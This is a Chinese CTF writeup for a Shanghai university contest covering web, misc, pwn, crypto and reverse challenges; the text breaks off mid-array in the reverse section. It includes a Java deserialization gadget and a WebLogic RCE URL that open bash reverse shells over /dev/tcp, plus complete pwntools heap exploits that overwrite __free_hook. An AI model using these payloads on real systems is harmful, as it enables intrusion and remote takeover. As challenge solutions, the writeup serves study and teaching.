上海市大学生大赛 Writeup

阅读量409917

|

发布时间 : 2021-11-08 15:31:52

 

Web

Ezgadget

import com.ezgame.ctf.tools.ToStringBean;
import com.sun.corba.se.spi.ior.ObjectKey;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;

public class Gadget {

    public static void main(String[] args) {
        try {

            ToStringBean payload = new ToStringBean();

            File clzFile = new File("C:\\Users\\Eki\\Projects\\learn-memshell\\Test\\target\\classes\\Evil.class");

            byte[] clzBytes = new byte[(int) clzFile.length()];

            FileInputStream fis = new FileInputStream(clzFile);
            fis.read(clzBytes); //read file into bytes[]
            fis.close();

            payload.setClassByte(clzBytes);


            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder");
            Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
            field.setAccessible(true);
            field.set(badAttributeValueExpException, payload);

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

            ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);

            out.writeUTF("gadgets");
            out.writeInt(2021);
            out.writeObject(badAttributeValueExpException);

            //String data = byteArrayOutputStream.toString();


            String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());

            System.out.println(data);
            /*
            byte[] b = Tools.base64Decode(data);
            InputStream inputStream = new ByteArrayInputStream(b);
            ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
            String name = objectInputStream.readUTF();
            int year = objectInputStream.readInt();
            if (name.equals("gadgets") && year == 2021) {
                objectInputStream.readObject();
            }*/
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}
public class Evil {
    static{
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/xxx/9855 0>&1"});
            p.waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

apacheProxy

apachesockscve SSRF
weblogice
http://47.104.90.78:7410/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(new+String[]{%22/bin/bash%22,%22-c%22,%22bash+-i+%3E%26+/dev/tcp/xxx/9855+0%3E%261%22});%22);

 

Misc

checkin

UTF-7,base64解码一下就出

project

有用的只有一个test.exe
里面邮件正常解密得到密钥hurryup
还有一个图片,图片后面9e97ba2a
从前段pwnhub比赛中知道是oursecret特征,放进去解密得到flag

jumpjumptiger

反编译exe发现一堆base64。
提取出来结合题目名字,来跳着取字符,得到一个png一个jpg

file=open('a.txt','r')
tot=0
data=''
import base64
for line in file:
    if tot<3:
        #data=line.encode('utf-8')
        data+=line[:-1]
    tot+=1
jpg_file=''
png_file=''
for i in range(0,len(data)):
    if i%2==1:
        jpg_file+=data[i]
    else:
        png_file+=data[i]
file_j=open('jpg.txt','w')
file_j.write(jpg_file)
file_p=open('png.txt','w')
file_p.write(png_file)

双图盲水印 得到flag

where_can_code_found

我们可以发现asc也可以通过WbStego4.3进行解密

空密码得到了云影密码,得到BINGO。通过

Translate J into I 我们可以想到 playfair密码。那么BINGO也就是这个的密钥

利用这个来解密即可

tihuan='FLAGDAFDADDEEDCDBF'
flag='dpeb{e58ca5e2-2c51-4eef-5f5e-33539364deoa}'
ok='1234567890-{}'
tot=0
result=''
for i in flag:
    if i not in ok:
        result+=chr(ord(tihuan[tot])+32)
        tot+=1
    else:
        result+=i
print(result)

得到flag

 

Pwn

cpp1

堆溢出,改size泄露libc,堆重叠打free_hook

# -*- coding: UTF-8 -*-

from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

loacl = 0
context.log_level = 'debug'

if loacl:
  p = process("./pwn")
else:
  p = remote("47.104.143.202", "43359")


def choice(cmd):
  p.sendlineafter("4. Delete A Vuln\n>>",str(cmd))


def add(idx,size):
  choice(1)
  p.sendlineafter("I:>>",str(idx))
  p.sendlineafter("S:>>",str(size))


def edit(idx,data):
  choice(2)
  p.sendlineafter("I:>>",str(idx))
  p.sendlineafter("V:>>",data)


def show(idx):
  choice(3)
  p.sendlineafter("I:>>",str(idx))


def free(idx):
  choice(4)
  p.sendlineafter("I:>>",str(idx))


add(0,0xF0)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xF0)

edit(0,"a"*0xF8+p64(0x501))
free(1)
add(1,0xF0)
show(2)
addr = u64(p.recvuntil('\x7f').ljust(8,'\x00')) >> 8
libc_base = addr-96-libc.sym['__malloc_hook']-0x10
print hex(addr)
add(7,0xF0)
add(8,0xF0)
add(9,0xF0)
add(10,0xF0)
free(9)
free(8)
edit(7,'b'*0xF8+p64(0x101)+p64(libc_base+libc.sym['__free_hook']))
add(11,0xF0)
edit(11,"/bin/sh\x00")
add(9,0xF0)
edit(9,p64(libc_base+libc.sym['system']))
free(11)

# gdb.attach(p)
p.interactive()
# flag{96f7801e4e658271915cf5ab3aa26ee6}

gcc2

UAF改size构造unsortedbin,泄露libc打free_hook

# -*- coding: UTF-8 -*-

from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

loacl = 0
context.log_level = 'debug'

if loacl:
  p = process("./pwn")
else:
  p = remote("47.104.143.202", "15348")


def choice(cmd):
  p.sendlineafter("4. Delete A Vuln\n>>",str(cmd))


def add(idx,size):
  choice(1)
  p.sendlineafter("I:>>",str(idx))
  p.sendlineafter("S:>>",str(size))


def edit(idx,data):
  choice(2)
  p.sendlineafter("I:>>",str(idx))
  p.sendlineafter("V:>>",data)


def show(idx):
  choice(3)
  p.sendlineafter("I:>>",str(idx))


def free(idx):
  choice(4)
  p.sendlineafter("I:>>",str(idx))


add(0,0x60)
add(1,0x60)
add(2,0x60)#0x71==0x461
add(3,0x60)#0x71
add(4,0x60)#0x71
add(5,0x60)#0x71
add(6,0x60)#0x71
add(7,0x60)#0x71
add(8,0x60)#0x71
add(9,0x60)#0x71
add(10,0x60)#0x71
add(11,0x60)#0x71
add(12,0x60)#0x71==
edit(12,"/bin/sh\x00")


free(0)
free(1)
show(1)
heap_addr = u64(p.recvuntil("\x55").ljust(8,'\x00'))>>8
print hex(heap_addr)
addr = heap_addr+0xD0
edit(1,p64(addr))
add(13,0x60)#0x71
add(14,0x60)#0x71
edit(14,p64(0)+p64(0x461))
free(2)
show(2)
addr = u64(p.recvuntil("\x7f").ljust(8,'\x00'))>>8

libc_base = addr-96-libc.sym['__malloc_hook']-0x10
print hex(libc_base)
free(4)
free(5)
edit(5,p64(libc_base+libc.sym['__free_hook']))
add(15,0x60)
add(16,0x60)
edit(16,p64(libc_base+libc.sym['system']))

free(12)

# gdb.attach(p)
p.interactive()
# flag{c9749ef8cbfdc4fc56542daea489a71c}

bg3

size数组没有清空且edit的时候使用”+=”得到chunk的size,多次申请并释放构造堆溢出,泄露libc打free_hook.

# -*- coding: UTF-8 -*-

from pwn import *
context(os='linux',arch='amd64')
elf = ELF("./pwn")
libc = ELF('./libc-2.31.so')
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

loacl = 0
context.log_level = 'debug'

if loacl:
  p = process("./pwn")
else:
  p = remote("47.104.143.202", "25997")


def choice(cmd):
  p.sendlineafter("4. Remove A Bug From DataBase\nSelect:",str(cmd))


def add(idx,size):
  choice(1)
  p.sendlineafter("Index:",str(idx))
  p.sendlineafter("Length:",str(size))


def edit(idx,data):
  choice(2)
  p.sendlineafter("Index:",str(idx))
  p.sendlineafter("Info:",data)


def show(idx):
  choice(3)
  p.sendlineafter("Index:",str(idx))


def free(idx):
  choice(4)
  p.sendlineafter("Index:",str(idx))


add(0,0x60)
add(1,0x60)#==0x460 [12]
add(2,0x60)#
add(3,0x60)
add(4,0x60)
add(5,0x60)
add(6,0x60)
add(7,0x60)
add(8,0x60)
add(9,0x60)
add(10,0x60)#==0x460
add(11,0x60)

free(0)
add(0,0x60)
edit(0,"a"*0x60+p64(0)+p64(0x461))
free(1)
add(12,0x60)
show(2)
libc_base = u64(p.recvuntil('\x7f').ljust(8,'\x00')) >> 8
libc_base = libc_base-96-libc.sym['__malloc_hook']-0x10
free(0)
add(0,0x60)
free(0)
add(0,0x60)
add(14,0x60)
add(15,0x60)
free(15)
free(14)
edit(0,"a"*0x60+p64(0)*1+p64(0x71)+p64(0)*13+p64(0x71)+p64(libc_base+libc.sym['__free_hook']))
add(14,0x60)
edit(14,"/bin/sh\x00")
add(15,0x60)
edit(15,p64(libc_base+libc.sym['system']))
free(14)


# gdb.attach(p)
p.interactive()
# flag{7240aca686aa4bc4d7697b2d7b5c7655}

boom

数组越界,改size堆溢出泄露libc,然后改fd申请到__free_hook-0x28,申请数组改为system

#!python
#coding:utf-8

from pwn import *
import subprocess, sys, os
from time import sleep

sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)

elf_path = './boom_script'
ip = '47.104.143.202'
port = 41299
remote_libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
LIBC_VERSION = ''
HAS_LD = False
HAS_DEBUG = False

context(os='linux', arch='amd64')
context.log_level = 'debug'

def run(local = 1):
    LD_LIBRARY_PATH = './lib/'
    LD = LD_LIBRARY_PATH+'ld.so.6'
    global elf
    global p
    if local == 1:
        elf = ELF(elf_path, checksec = False)
        if LIBC_VERSION:
            if HAS_LD:
                p = process([LD, elf_path], env={"LD_LIBRARY_PATH": LD_LIBRARY_PATH})
            else:
                p = process(elf_path, env={"LD_LIBRARY_PATH": LD_LIBRARY_PATH})
        else:
            p = process(elf_path)
    else:
        p = remote(ip, port)
def debug(cmdstr=''):
    if HAS_DEBUG and LIBC_VERSION:
        DEBUG_PATH = '/opt/patchelf/libc-'+LIBC_VERSION+'/x64/usr/lib/debug/lib/x86_64-linux-gnu/'
        cmd='source /opt/patchelf/loadsym.py\n'
        cmd+='loadsym '+DEBUG_PATH+'libc-'+LIBC_VERSION+'.so\n'
        cmdstr=cmd+cmdstr
    gdb.attach(p, cmdstr)
    pause()
def loadlibc(filename = remote_libc_path):
    global libc
    libc = ELF(filename, checksec = False)
def one_gadget(filename = remote_libc_path):
    return map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split(' '))
def str2int(s, info = '', offset = 0):
    if type(s) == int:
        s = p.recv(s)
    ret = u64(s.ljust(8, '\x00')) - offset
    success('%s ==> 0x%x'%(info, ret))
    return ret

def chose(idx):
    sla('Chose', str(idx))
def add(idx, size, content = '\n'):
    chose(1)
    sla('Index', str(idx))
    sla('Size', str(size))
    sa('Content', content)
def edit(idx, content):
    chose(2)
    sla('Index', str(idx))
    sa('Content', content)
def free(idx):
    chose(3)
    sla('Index', str(idx))
def show(idx):
    chose(4)
    sla('Index', str(idx))
def com(str):
    global payload
    payload += str + ';\n'
def add(name, size):
    com('{}="{}"'.format(name, size*'a'))

run(0)
# debug('b *0x8002BEB')

payload = '''
function de {{
    return 1;
}}
'''
# com('array gank1[1]')
# com('array gank2[1]')
# com('array gank3[1]')
# com('array gank4[1]')
# com('array gank5[1]')
# com('array gank6[1]')
# com('array gank7[1]')
# com('a=1')
# com('bb=1')
# com('chose=1')
# add('leak', 1)
# add('leak2', 1)
# add('leak', 0x100)
# add('leak2', 0x100)
# add('leak', 1)
# com('prints(leak)')

com('array hackarr[1]')
com('hack1="'+'a'*0x70+'"')
com('hack2="'+'a'*0x40+'"')

com('array arr[1]')
com('c="{}"'.format('a'*0x31))
com('d="456"')
com('arr[2]=49')
com('att="{}"'.format('a'*0x500))
com('p1="{}"'.format('a'*0x60))
com('p1="{}"'.format('a'*0x40))
com('p1="{}"'.format('a'*0x100))
com('p1="/bin/sh"')
com('d="{}"'.format('a'*1))
com('att="{}"'.format('a'*1))
com('e="{}"'.format('a'*0x18+'b'*8))
com('prints(e)')
com('hack2="{}"'.format('a'*0x60))
com('inputn(a)')
com('hackarr[3]=a')
com('xxx="{}"'.format('a'*0x40))
com('array final[1]')
com('inputn(a)')
com('final[0]=a')
com('p1="{}"'.format('a'*0x100))

com('de(a)')

sla('$', '1')
sla('length:\n', str(len(payload)))
sa('code:\n', payload)

# p.recvuntil('running...\n')
# heap = str2int(p.recvuntil('\n')[:-1], 'heap', 0x8077461 - 0x8077290)

p.recvuntil('b'*0x8)
loadlibc()
libc.address = str2int(6, 'libc', libc.sym['__malloc_hook']+0x70)

sleep(0.01)
p.sendline(str(libc.sym['__free_hook']-0x28))
# offset = (libc.sym['__free_hook'] - 0x28 - heap)
# for i in range(7):
#     if (offset+i*0x50)%0x38 == 0:
#         a = (offset+i*0x50)/0x38
#         b = libc.sym['system']
#         cc = i+1
#         break

# sleep(0.01)
# p.sendline(str(a))
# sleep(0.01)
# p.sendline(str(b))
# sleep(0.01)
# p.sendline(str(cc))

sleep(0.01)
p.sendline(str(libc.sym['system']))


p.interactive()

 

Crypto

The_RSA

common d。算一下界,要6组就可以构造一个格解d了

from Crypto.Util.number import *
from pwn import *
import itertools as its
import string
from hashlib import sha256


ip, port = '47.104.183.8', 58462
# context.log_level = 'debug'

io = remote(ip, port)

io.recvuntil(b'XXXX+')
s = io.recvuntil(b') == ')[:-5]
hc = io.recvuntil(b'\n').strip().decode()
io.recvuntil(b' XXXX :')
words = string.ascii_letters + string.digits
r = its.product(words, repeat=4)
for i in r:
    h = sha256((''.join(i).encode() + s)).hexdigest()
    if h == hc:
        io.sendline(''.join(i).encode())
        break

N = []
E = []
C = []
for i in range(6):
    io.recvuntil(b'hat do you want to do?\n')
    io.sendline(b'1')
    e, n, c = eval(io.recvuntil(b'\n').decode().strip()[3:])
    N.append(n)
    E.append(e)
    C.append(c)

io.sendline(b'2')


delta = 435./1024

M = int(sqrt(N[5]))
B = Matrix(ZZ, [ [M,  E[0],  E[1],  E[2],  E[3],  E[4],  E[5]],
                 [0, -N[0],     0,     0,     0,     0,     0],
                 [0,     0, -N[1],     0,     0,     0,     0],
                 [0,     0,     0, -N[2],     0,     0,     0],
                 [0,     0,     0,     0, -N[3],     0,     0],
                 [0,     0,     0,     0,     0, -N[4],     0],
                 [0,     0,     0,     0,     0,     0, -N[5]]])
L = B.LLL()
d = int(L[0][0] / M)
print(d)

for i in range(6):
    print(long_to_bytes(pow(C[i], d, N[i])))

block cipher

发现规律 密文差分是明文差分二倍。
选择明文攻击 ez

传一次48字节明文,收到一个密文,再拿一次flag密文
计算flag密文和已知密文差分,除以2,和已知明文异或 就是flag

fermat’s revenge

hintp\equiv 1011^qq\ mod\ n\
q\equiv 1011^qqhint^{-1}\ mod n\
1011^qhint^{-1}= 1+ kp\
费马小定理得,(1011^{p-1}-kp)(1011^qhint^{-1})=tp\
(1011^{n-1}hint^{-1})\%(n-1)=kp

gcd即可

CryptoSystem

hint部分用sage求s,再用费马小定理分解n得到p

from Crypto.Util.number import inverse, long_to_bytes

p = 11704602934176759298266213423114891493824916364795978469364524885399760428906015479407230137777563251525502066790836884862088509654031834827866112229646287
q = 8102629067081196663344380051036364913486884958511293329215799851980156535639525773862943502278622329075523611986041747264662648303657273142937759092732383
N = p * q
param = (94838055953104472310020336849161906597270875083875935416005298095630163598779959260413267847713143964237534199642297293652763137312313661870292629408730403218471443807586408082416986269585654162055563577353421655366755587333747937935478818301644202126262621687419423878277111644527700593904018451376440611921, 8222220570332735331949763152648643878282797014372489167249681610732943758559638292763163612903100016043213373570246365367819395127227607081784918414517609326236531013392638264924887790191415928816964434122789390222670507904271026857201091641296283721697112493387765424655204734684772094363463488547209898317618020210347466934206863781079250288263237602677774540340474214135433352664684289611895081372394132170101657166399519419319057509388402930386023764745405611423456734910055143884558701621843650647393051425844754545495930833842659454191685794067914903168454978809697068321562570292853621020380904691313994605614)
pk_list = [3564554126020601767122284155272940244115500916016690385720248412732293807827407623646169394942033115971886678929792807813266464390660211985312997812329515691706163088814597082151349321353465507174614151445441969371190953327690535213134464187643911325170125446717958555985134293439626833239300029345162925717978071151676511527322942774720259645694753534050935244653861171239044020817096899676384226961132345628523865720523833528694212362621440726964630421257765523134808293386374936416895389512896809663386643328753578557272723069570535659506162276122557173102614609443356563987630989432500797285594919664338771725548, 51949631032466677884668777990481020678624011707837057355490471112729702272480832691255853566519006825061781532550206121975328286788036668106961747512051795567692299712109597841475700846356050296497291275039000765449499726500039624258560686675685497565524045405208520158368584743775151242037524141494259080758524153656665822512005270418521352058653437680515077881459829836376524927212130651643653069458193875067760192379047708213297086044860106167886934476995436190533245156835175098152649119356965433166238098375648549763912220138594204326046368469923059016088650753552409534212180668073391353579591467415787490149, 7986362162025905689231646843334955186263434112251956149464261793941501933787501290327864521855021682488811066081880924979479476227828398154818993276184432317646528325274723812812157654126066449698234094317343864756583199062105112858625759329850627679835473484861288614076796400075479845418499958800738440381114671922155276790365493080496734023502844556676823283705667259707410938168389976063614068996886044918020087684059481349150957896660913638014994456400081162044754080463653541838895680936763809711998377500016788713084589760458829219553832790437896361321347126225712699163293119653230062051692305584870448136781, 5509215895469694413348792868619651606298725002151671067953611964180811460996395169086607883812267265330756971374354016051661555614907459670730827391377556955419648506942552769668103752188785264563836719708904562565395760871051871503662833918521645609484375521558246117207684064040280887682094573323668742331437806345757112769325888710104679453602928017179026121413614201055360020689986219186478012498427895992471540694275566824503335098369079778528444671655093810291648410623186225087794871022199736965535212998572558375484552077908177813824038350860742907421950961985127384482416814578227658638416785748962245352439, 8496539211519908291270238891814138985850458858448358176258096335494263978565038410645728760545519239258839788622699527580123928735756947867908186216355019036081461698526439932842895772667215815571161769376330300506786557148418617625613356337520209443577663597144819464591231136429789085020820633516461255085342249140282172605131301349438939914194791529515027683769376169944474544341419673871048137199438363027021539465707255176263391073672475085240925242765398549550846051893117654286203093128819952079205390072682068591722110732509800859194325896617059125401089781447015715505398175009798381976557063365858810742142, 3119521321597798116564410527295891208645456104060100910111522194458734425455591287735172248550909361509594435828980202549592100379040319465629415595273252574892211076833978936222563685826278814956395123225345328104185454548941642244945706562341832270981273594299024984702484297185231135774151499320150517647084638177642234122468778443225112500830045691341257387684698969412693394273985986695854974792963826574899053511454361023453085928676328028619308765823192567800541796687870557788801872908098337374005435236061927994485526068927129418361391784831965701811151290780330859535341501860848477927126740856918456827291]
flag = [(1895110770974995776327537266248645419592814983548926525437013518755346649444208974302394383159320186478586984380460834297376738215275196908233459414481279510660434502430584946210015761116096559993138033422232322205417089713715792462148266154681511980963196925272212322451769279858886519718456825642066511529164347278255378844543664848230789360929037676499703295348322396452663567275796483693389548472754318913963185293878328106568590355987410084594983497641544456926403558798930063249463637161594034131199943263851641833765484819686520866681950162068025598423696701886851742204509988002349788546319112034075714312163, 8348350425773992988408167765217389425274192139844001852066738270973295915297143283242462996481508118979253393755742191573847006962006274688581781912437955445592262306425613723348411357321599513125881947346990562543878420352203105340933434809655405928444870086324601412608914319751495984719849933372727094414306779574276837370714046686861111546936020579823910332640232854894180523132020562537521197208021210983039338276655307580027934011561533302322216926852401079374537918217126655560305488588948296068120485570362089570563838759123676837800286896529658149159800187475878092705018821811351554640010191745115198926729), (6547809729172062304392126567614144868617944394732518155378084330520068508944823016924954658050454785198615021551772182688199414233011285480747763346302773917450781361120304381787257876610018297816639792744296674246887548754910409019518666210650367859779742855094676737197174544665173860717946678840016688436725882025615620073152140353058810737281150704650761914946976776704231686913452688276252021445545896237250980890065511268183838487390628912637968844991376592402406772430984032171990745811658293576445197144511626491585084413059744980471426546094287632039346409112057840983875817148858666952294956181250461856727, 539528453684836200118955530842589018546029088855716355156500219259690558396330164491918715822444227634675506487994034492800817469832277488578430854174557192595864956557206606826654857835787752369409754557744246335095899973249207055361021399515390376583628070615936281523211356529036166106830676433869682725700717254113750652538046466452260462276415675855317604867243005909900738067651581774120505766957586567542946870640123744588141161010436594403199427052069196656642284825947561364959628812322048378996891488397757980262208271379463477516167028150986793395137095016611002570558674441426374196667515380651984957729), (4869650850425919416572388145326425772638525050861630686643744949656592837549732864690684532415944148101547995272030012523064173428838619508457101402008366457798078556087381468237471902355558394382673722165234880942860179254786165620321427855692724609011739978918256781054578291077961004857146604484714444009523337298690950898549947332439108558434716919454113930269728302628959956631536980830855034437738402400353541776986351148604387691003875703722316937115796400515194605182859646636553735257268146588183361484214839579049722298047072153673443940251998151806354993805797713908029260083838662190617946860551089298943, 7477912295493345893183371250351610156892382750787286524460920943843540549340840785530351906205032267138458823248478655539200869235599834519743117327403731292040268105667149767785329069038244007226784238949734318572364133991058911852783555638852122803877599718608864354211231599109981059447732806535526300211343793104419468619374147853501937286506933491095693771742551510050426543066196576641064623792290518495855220209878655263131455722688600983849900083086004273403349497620372901607922066236440188529960719856024629999714297911192436570687641866490877509997699025253825619385472786733515782407425030437357666752735), (6464727516232552647517501061506933116555314308990921079953837751993642815052207769221099037180506306354359193985109287613843001577101441890246251292357057194252327332285029147137878590311575121375567217071958285290048665289406183977993059776333416404803071125093208575240141621690783046975148663035653967462158779605726760538781734904023609304894799127796425513959758085675576028049993611506807479802949052140092824593347849096382560033934201868677224529604199285187373552841491661731380398866783748630346038796305091917446725093553002844414148870721532404063380447115114632155714121547435395217163756132790416742671, 6850411664195376422025015206118711455689423960379448891788100075660460492264704602269805771393450722446242159327697560772085476860414884516935965530040190362623796801001778234596616473797593170296144184102247592973716496801111195165570133022077886576708739395218886915952502308693203274582997039256664260473505597761567811949858685818888942390299572811059785582141812901034732844688946029036549256354513607106473086010207691771969649836726655229055635019906651333628738473554556488660520478529649528373696986915219562143713043132611075675187178303726985191698014439680680044186462534712096396621223123585558459420608), (6534301014881654707404673876996948839322179804775776198166402518439867813315601790257627516981360792935422027690182974155688806158814828361838521557393132633842885393287083618132390820890550229370087175513804335167215277291646001454117359341327904799219955402894753620724890162571483666292356287731882060888796217553234455417347076014235929438071226485172187184889899875554490425650927577044520045498565491252242739066380153010758764773480636245956149958887681546111115432766828253376921942485117934974672598288151203182541748236665991282944739910595822585505403340465327236160529875561469600273400146032402620778254, 6742462105379692268051835178142047339172529427092119397881803064555921035237781884806727179281323359877963929066017083219523421113234461320428533584688996704275467594541285196512716180625961796315949820908869133790341068665993009154482389241267593244194078836311538380821273504497492996050216549058275732250459768518903549747081450622345060004943485543622323398418505307471458822571948009393008762637305373255750791849250707727735049422531168722372589013783569345380063173149712893149166326061044252126030213920719005474090812886717033703158392986098353386773348092068175880145897600731191143690605750357983433719183), (5990426986098997970818954794603039707504702739722710528441777553622267718742652468716180586265258522973226385541495202947655385191365447432432365094500178009123156691485339968328350333436219311394416230126804951925419830936501110064157997300077429763250083534219761864352597543538198282085471343174927688785494653435499436489275447194656682111521588793398673638067458780511219243399664020715331659228079042025365658003388653304544672647819094163881890397380413581251822121267344979474727881550899581702181772564406911776258773790201004654312336810609038653018905795882079795983978327976054984690490535815381455614257, 8823069339108363748726506971270735400841974924478629831426013975943540746347985519621759355136707318375847077087399141582390004491705082509496101218047679222287289789004545273051737545951071318937120089046135323108334989581340149384250404798117270903737280395538472871233806086323332049381128843913329095059069394096764788511394035193484935857735625769677601168795441300651978953981363233155266673928086194838316342484379551057381607920958594926026280971672115801001160385935285506024128335995610854601196074878804310703463050175734399540885788308476474930479920409797535094302009070658075556086735218614785836017758)]

g = param[1]
p0 = (p - 1) // 2
q0 = (q - 1) // 2

k = (pow(g, p0*q0, N**2) -1) // N

out = b''
msg = [123,456,789,123,456,789]

for i in range(6):
    r0 = (((pow(flag[i][0], p0*q0, N**2) - 1) * inverse(k, N**2)) % (N**2)) // N
    a0 = (((pow(pk_list[i], p0*q0, N**2) - 1) * inverse(k, N**2)) % (N**2)) // N
    m = ((pow(flag[i][1], p0*q0, N**2) -1) // N - k*a0*r0) * inverse(p0*q0, N) % N
    out += long_to_bytes(m - msg[i])

print(out)

 

Reverse

Hello

主要逻辑在so

先是将输入异或(签名的值 + i)

之后高三位和低五位互换位置
最后比较,通过动调获取sign值,写exp

#include <stdio.h>

int main()
{
    int i, j;
    unsigned char sign[] =
        {
            0x33, 0x30, 0x38, 0x32, 0x30, 0x32, 0x65, 0x34, 0x33, 0x30,
            0x38, 0x32, 0x30, 0x31, 0x63, 0x63, 0x30, 0x32, 0x30, 0x31,
            0x30, 0x31, 0x33, 0x30, 0x30, 0x64, 0x30, 0x36, 0x30, 0x39,
            0x32, 0x61, 0x38, 0x36, 0x34, 0x38, 0x38, 0x36, 0x66, 0x37,
            0x30, 0x64, 0x30, 0x31, 0x30, 0x31, 0x30, 0x35, 0x30, 0x35,
            0x30, 0x30, 0x33, 0x30, 0x33, 0x37, 0x33, 0x31, 0x31, 0x36,
            0x33, 0x30, 0x31, 0x34, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35,
            0x30, 0x34, 0x30, 0x33, 0x30, 0x63, 0x30, 0x64, 0x34, 0x31,
            0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39,
            0x36, 0x34, 0x32, 0x30, 0x34, 0x34, 0x36, 0x35, 0x36, 0x32,
            0x37, 0x35, 0x36, 0x37, 0x33, 0x31, 0x31, 0x30, 0x33, 0x30,
            0x30, 0x65, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35, 0x30, 0x34,
            0x30, 0x61, 0x30, 0x63, 0x30, 0x37, 0x34, 0x31, 0x36, 0x65,
            0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39, 0x36, 0x34,
            0x33, 0x31, 0x30, 0x62, 0x33, 0x30, 0x30, 0x39, 0x30, 0x36,
            0x30, 0x33, 0x35, 0x35, 0x30, 0x34, 0x30, 0x36, 0x31, 0x33,
            0x30, 0x32, 0x35, 0x35, 0x35, 0x33, 0x33, 0x30, 0x32, 0x30,
            0x31, 0x37, 0x30, 0x64, 0x33, 0x32, 0x33, 0x31, 0x33, 0x30,
            0x33, 0x33, 0x33, 0x30, 0x33, 0x36, 0x33, 0x31, 0x33, 0x34,
            0x33, 0x33, 0x33, 0x30, 0x33, 0x34, 0x33, 0x38, 0x35, 0x61,
            0x31, 0x38, 0x30, 0x66, 0x33, 0x32, 0x33, 0x30, 0x33, 0x35,
            0x33, 0x31, 0x33, 0x30, 0x33, 0x32, 0x33, 0x32, 0x33, 0x37,
            0x33, 0x31, 0x33, 0x34, 0x33, 0x33, 0x33, 0x30, 0x33, 0x34,
            0x33, 0x38, 0x35, 0x61, 0x33, 0x30, 0x33, 0x37, 0x33, 0x31,
            0x31, 0x36, 0x33, 0x30, 0x31, 0x34, 0x30, 0x36, 0x30, 0x33,
            0x35, 0x35, 0x30, 0x34, 0x30, 0x33, 0x30, 0x63, 0x30, 0x64,
            0x34, 0x31, 0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66,
            0x36, 0x39, 0x36, 0x34, 0x32, 0x30, 0x34, 0x34, 0x36, 0x35,
            0x36, 0x32, 0x37, 0x35, 0x36, 0x37, 0x33, 0x31, 0x31, 0x30,
            0x33, 0x30, 0x30, 0x65, 0x30, 0x36, 0x30, 0x33, 0x35, 0x35,
            0x30, 0x34, 0x30, 0x61, 0x30, 0x63, 0x30, 0x37, 0x34, 0x31,
            0x36, 0x65, 0x36, 0x34, 0x37, 0x32, 0x36, 0x66, 0x36, 0x39,
            0x36, 0x34, 0x33, 0x31, 0x30, 0x62, 0x33, 0x30, 0x30, 0x39,
            0x30, 0x36, 0x30, 0x33, 0x35, 0x35, 0x30, 0x34, 0x30, 0x36,
            0x31, 0x33, 0x30, 0x32, 0x35, 0x35, 0x35, 0x33, 0x33, 0x30,
            0x38, 0x32, 0x30, 0x31, 0x32, 0x32, 0x33, 0x30, 0x30, 0x64,
            0x30, 0x36, 0x30, 0x39, 0x32, 0x61, 0x38, 0x36, 0x34, 0x38,
            0x38, 0x36, 0x66, 0x37, 0x30, 0x64, 0x30, 0x31, 0x30, 0x31,
            0x30, 0x31, 0x30, 0x35, 0x30, 0x30, 0x30, 0x33, 0x38, 0x32,
            0x30, 0x31, 0x30, 0x66, 0x30, 0x30, 0x33, 0x30, 0x38, 0x32,
            0x30, 0x31, 0x30, 0x61, 0x30, 0x32, 0x38, 0x32, 0x30, 0x31,
            0x30, 0x31, 0x30, 0x30, 0x63, 0x62, 0x66, 0x32, 0x62, 0x30,
            0x39, 0x65, 0x34, 0x33, 0x30, 0x38, 0x65, 0x62, 0x62, 0x34,
            0x35, 0x39, 0x65, 0x38, 0x38, 0x34, 0x31, 0x65, 0x35, 0x61,
            0x37, 0x62, 0x39, 0x32, 0x30, 0x34, 0x39, 0x37, 0x66, 0x65,
            0x66, 0x32, 0x62, 0x33, 0x34, 0x39, 0x65, 0x38, 0x30, 0x36,
            0x34, 0x38, 0x66, 0x37, 0x65, 0x62, 0x33, 0x35, 0x66, 0x34,
            0x38, 0x64, 0x34, 0x30, 0x61, 0x37, 0x35, 0x65, 0x37, 0x63,
            0x65, 0x37, 0x39, 0x34, 0x35, 0x62, 0x38, 0x62, 0x34, 0x32,
            0x64, 0x31, 0x39, 0x37, 0x62, 0x65, 0x63, 0x30, 0x62, 0x66,
            0x31, 0x37, 0x37, 0x65, 0x36, 0x63, 0x39, 0x38, 0x39, 0x39,
            0x65, 0x64, 0x37, 0x30, 0x37, 0x64, 0x63, 0x63, 0x34, 0x61,
            0x37, 0x32, 0x36, 0x63, 0x62, 0x31, 0x34, 0x63, 0x31, 0x61,
            0x36, 0x39, 0x62, 0x30, 0x63, 0x34, 0x61, 0x30, 0x32, 0x34,
            0x37, 0x34, 0x38, 0x30, 0x36, 0x66, 0x61, 0x37, 0x33, 0x63,
            0x66, 0x62, 0x31, 0x30, 0x65, 0x31, 0x30, 0x66, 0x37, 0x62,
